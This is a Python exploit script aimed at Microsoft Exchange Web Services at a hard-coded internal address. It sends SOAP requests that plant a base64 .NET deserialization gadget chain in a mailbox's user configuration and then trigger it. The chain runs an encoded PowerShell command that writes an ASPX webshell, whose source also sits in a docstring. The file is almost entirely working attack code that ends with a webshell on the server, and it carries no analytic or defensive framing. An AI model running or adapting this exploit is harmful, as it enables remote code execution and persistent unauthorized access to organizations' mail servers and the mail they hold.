#!/usr/bin/python
import socket, time
import httplib, requests
import urllib
import os, ssl

from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
import base64

'''
<%@ Page Language="JScript" Debug="true"%><%@Import Namespace="System.IO"%><%File.WriteAllBytes(Request["b"], Convert.FromBase64String(Request["a"]));%>
'''

target = "https://10.0.0.52"

# write a webshell to aspnet_client
gadgetData = 'AAEAAAD/////AQAAAAAAAAAMAgAAAAhtc2NvcmxpYgwDAAAATlN5c3RlbS5EYXRhLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQUBAAAAY1N5c3RlbS5EYXRhLkRhdGFTZXQsIFN5c3RlbS5EYXRhLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoAAAAWRGF0YVNldC5SZW1vdGluZ0Zvcm1hdBNEYXRhU2V0LkRhdGFTZXROYW1lEURhdGFTZXQuTmFtZXNwYWNlDkRhdGFTZXQuUHJlZml4FURhdGFTZXQuQ2FzZVNlbnNpdGl2ZRJEYXRhU2V0LkxvY2FsZUxDSUQaRGF0YVNldC5FbmZvcmNlQ29uc3RyYWludHMaRGF0YVNldC5FeHRlbmRlZFByb3BlcnRpZXMURGF0YVNldC5UYWJsZXMuQ291bnQQRGF0YVNldC5UYWJsZXNfMAQBAQEAAAACAAcfU3lzdGVtLkRhdGEuU2VyaWFsaXphdGlvbkZvcm1hdAMAAAABCAEIAgIAAAAF/P///x9TeXN0ZW0uRGF0YS5TZXJpYWxpemF0aW9uRm9ybWF0AQAAAAd2YWx1ZV9fAAgDAAAAAQAAAAYFAAAAAAkFAAAACQUAAAAACQQAAAAKAQAAAAkGAAAADwYAAAD2BQAAAgABAAAA/////wEAAAAAAAAADAIAAABeTWljcm9zb2Z0LlBvd2VyU2hlbGwuRWRpdG9yLCBWZXJzaW9uPTMuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUBAAAAQk1pY3Jvc29mdC5WaXN1YWxTdHVkaW8uVGV4dC5Gb3JtYXR0aW5nLlRleHRGb3JtYXR0aW5nUnVuUHJvcGVydGllcwEAAAAPRm9yZWdyb3VuZEJydXNoAQIAAAAGAwAAAJgKPD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTE2Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIgLUVuY29kZWRDb21tYW5kIFV3QmxBSFFBTFFCREFHOEFiZ0IwQUdVQWJnQjBBQ0FBTFFCUUFHRUFkQUJvQUNBQUp3QkRBRG9BWEFCcEFHNEFaUUIwQUhBQWRRQmlBRndBZHdCM0FIY0FjZ0J2QUc4QWRBQmNBR0VBY3dCd0FHNEFaUUIwQUY4QVl3QnNBR2tBWlFCdUFIUUFYQUF4QUM0QVlRQnpBSEFBZUFBbkFDQUFMUUJXQUdFQWJBQjFBR1VBSUFBbkFEd0FKUUJBQUNBQVVBQmhBR2NBWlFBZ0FFd0FZUUJ1QUdjQWRRQmhBR2NBWlFBOUFDSUFTZ0JUQUdNQWNnQnBBSEFBZEFBaUFDQUFSQUJsQUdJQWRRQm5BRDBBSWdCMEFISUFkUUJsQUNJQUpRQStBRHdBSlFCQUFFa0FiUUJ3QUc4QWNnQjBBQ0FBVGdCaEFHMEFaUUJ6QUhBQVlRQmpBR1VBUFFBaUFGTUFlUUJ6QUhRQVpRQnRBQzRBU1FCUEFDSUFKUUErQUR3QUpRQkdBR2tBYkFCbEFDNEFWd0J5QUdrQWRBQmxBRUVBYkFCc0FFSUFlUUIwQUdVQWN3QW9BRklBWlFCeEFIVUFaUUJ6QUhRQVd3QWlBR0lBSWdCZEFDd0FJQUJEQUc4QWJnQjJBR1VBY2dCMEFDNEFSZ0J5QUc4QWJRQkNBR0VBY3dCbEFEWUFOQUJUQUhRQWNnQnBBRzRBWndBb0FGSUFaUUJ4QUhVQVpRQnpBSFFBV3dBaUFHRUFJZ0JkQUNrQUtRQTdBQ1VBUGdBbkFBPT0iIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0icG93ZXJzaGVsbC5leGUiIC8+DQogICAgICA8L3NkOlByb2Nlc3MuU3RhcnRJbmZvPg0KICAgIDwvc2Q6UHJvY2Vzcz4NCiAgPC9PYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQo8L09iamVjdERhdGFQcm92aWRlcj4LCw=='

def sendPayload(gadgetChain):
    get_inbox = '''<?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
      <soap:Header>
        <t:RequestServerVersion Version="Exchange2013" />
      </soap:Header>
      <soap:Body>
        <m:GetFolder>
          <m:FolderShape>
            <t:BaseShape>AllProperties</t:BaseShape>
          </m:FolderShape>
          <m:FolderIds>
            <t:DistinguishedFolderId Id="inbox" />
          </m:FolderIds>
        </m:GetFolder>
      </soap:Body>
    </soap:Envelope>
    '''
    try:
        headers = {"User-Agent": "ExchangeServicesClient/15.01.2308.008", "Content-type" : "text/xml; charset=utf-8"}
        print("[+] show AllProperties")

        res = requests.post(target + "/ews/exchange.asmx", 
                    data=get_inbox, 
                    headers=headers, verify=False,proxies={"https":"127.0.0.1:8080"})


        folderId = res.content.split('<t:FolderId Id="')[1].split('"')[0]
        changeKey = res.content.split('<t:FolderId Id="' + folderId + '" ChangeKey="')[1].split('"')[0]
        print("[+] folderId: "+ folderId)
        print("[+] changeKey: "+ changeKey)
    except Exception as e:
        print(str(e))
        print("[-] show AllProperties failed.")
    

    delete_old = '''<?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
      <soap:Header>
        <t:RequestServerVersion Version="Exchange2013" />
      </soap:Header>
      <soap:Body>
        <m:DeleteUserConfiguration>
          <m:UserConfigurationName Name="ExtensionMasterTable">
            <t:FolderId Id="%s" ChangeKey="%s" />
          </m:UserConfigurationName>
        </m:DeleteUserConfiguration>
      </soap:Body>
    </soap:Envelope>''' % (folderId, changeKey)

    try:
        print("[+] DeleteUserConfiguration")
        res = requests.post(target + "/ews/exchange.asmx", 
                    data=delete_old, 
                    headers=headers, 
                                verify=False, 
                                proxies={"https":"127.0.0.1:8080"})
    except Exception as e:
        print(str(e))
        print("[-] DeleteUserConfiguration failed.")
    



    create_usr_cfg = '''<?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
      <soap:Header>
        <t:RequestServerVersion Version="Exchange2013" />
      </soap:Header>
      <soap:Body>
        <m:CreateUserConfiguration>
          <m:UserConfiguration>
            <t:UserConfigurationName Name="ExtensionMasterTable">
              <t:FolderId Id="%s" ChangeKey="%s" />
            </t:UserConfigurationName>
            <t:Dictionary>
              <t:DictionaryEntry>
                <t:DictionaryKey>
                  <t:Type>String</t:Type>
                  <t:Value>OrgChkTm</t:Value>
                </t:DictionaryKey>
                <t:DictionaryValue>
                  <t:Type>Integer64</t:Type>
                  <t:Value>637728170914745525</t:Value>
                </t:DictionaryValue>
              </t:DictionaryEntry>
              <t:DictionaryEntry>
                <t:DictionaryKey>
                  <t:Type>String</t:Type>
                  <t:Value>OrgDO</t:Value>
                </t:DictionaryKey>
                <t:DictionaryValue>
                  <t:Type>Boolean</t:Type>
                  <t:Value>False</t:Value>
                </t:DictionaryValue>
              </t:DictionaryEntry>
              <t:DictionaryEntry>
                <t:DictionaryKey>
                  <t:Type>String</t:Type>
                  <t:Value>OrgExtV</t:Value>
                </t:DictionaryKey>
                <t:DictionaryValue>
                  <t:Type>Integer32</t:Type>
                  <t:Value>2147483647</t:Value>
                </t:DictionaryValue>
              </t:DictionaryEntry>
            </t:Dictionary>
            <t:BinaryData>%s</t:BinaryData>
          </m:UserConfiguration>
        </m:CreateUserConfiguration>
      </soap:Body>
    </soap:Envelope>''' % (folderId, changeKey, gadgetChain)
    
    try:
        print("[+] CreateUserConfiguration")
        res = requests.post(target + "/ews/exchange.asmx", 
                    data=create_usr_cfg, 
                    headers=headers, 
                                verify=False, 
                                proxies={"https":"127.0.0.1:8080"})
    except Exception as e:
        print(str(e))
        print("[-] CreateUserConfiguration failed.")
    

    get_client_ext = '''<?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
      <soap:Header>
        <t:RequestServerVersion Version="Exchange2013" />
      </soap:Header>
      <soap:Body>
        <m:GetClientAccessToken>
          <m:TokenRequests>
            <t:TokenRequest>
              <t:Id>aaaa</t:Id>
              <t:TokenType>CallerIdentity</t:TokenType>
            </t:TokenRequest>
          </m:TokenRequests>
        </m:GetClientAccessToken>
      </soap:Body>
    </soap:Envelope>
    '''
    try:
        print("[+] Execute BinaryData")
        res = requests.post(target + "/ews/exchange.asmx", 
                    data=get_client_ext, 
                    headers=headers, 
                                verify=False, 
                                proxies={"https":"127.0.0.1:8080"},timeout=15)
        time.sleep(10)
        print("[*] webshell: " + target+"/aspnet_client/1.aspx")

    except Exception as e:
        print(str(e))
        print("[-] Execute BinaryData failed. Checking the Av or WAF.")
    
sendPayload(gadgetData)